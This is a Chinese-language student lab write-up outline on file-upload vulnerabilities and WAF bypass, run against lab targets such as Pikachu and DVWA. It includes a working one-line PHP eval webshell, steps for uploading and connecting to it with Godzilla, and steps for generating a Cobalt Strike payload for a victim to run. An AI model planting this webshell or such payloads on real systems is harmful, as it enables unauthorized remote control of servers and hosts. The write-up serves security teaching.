网络空间安全综合实践 - 文件上传 WAF 绕过实验:详细步骤与实战技巧
网络空间安全综合实践 - 文件上传 WAF 绕过实验:详细步骤与实战技巧
一句话木马编写
<?php @eval($_POST['cmd']);phpinfo(); ?>
webshell 的连接工具
如何连接 webshell
第一步:上传木马文件到目标服务器中
第二步:需要访问木马
第三步:连接木马文件
第四步:shell 管理
实验测试
2003 的导入虚拟机
写木马文件
访问木马
连接木马
哥斯拉的使用
ladon 扫描器
文件上传
http://172.20.69.110/pikachu/
http://172.20.69.110/dvwa/login.php
http://172.20.69.110/sqlit/
http://172.20.69.110/
http://172.20.69.110/phpmyadmin/
http://172.20.69.110/ekucms2.5/
第一步:确定目标地址
http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/servercheck.php
第二步:尝试上传文件
http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/uploads/shell.jpg
第三步:抓取上传数据包
第四步:更改数据包
第五步:访问目标
第六步:shell 连接
CS 的工具
工具下载
启动工具
第一步:打开 CS 的客户端
第二步:部署服务器端
任务:打开 cs.bat
CS 木马生成
第一步:设置监听器
第二步:设置 CS 马
第三步:让被攻击者运行此文件,受害主机上线(双击)
第四步:使用插件增强
实验心得与小结
本次实验主要学习了文件上传漏洞的原理和实践,以及如何利用一句话木马和 webshell 来获取被攻击者的权限。同时,还学习了使用哥斯拉和 ladon 扫描器来发现目标漏洞,以及使用 CS 工具生成木马文件。总的来说,本次实验让我更深入地了解了网络安全的相关概念和实践技巧,对提高网络安全意识和技能有很大的帮助。
原文地址: https://www.cveoy.top/t/topic/oYdB 著作权归作者所有。请勿转载和采集!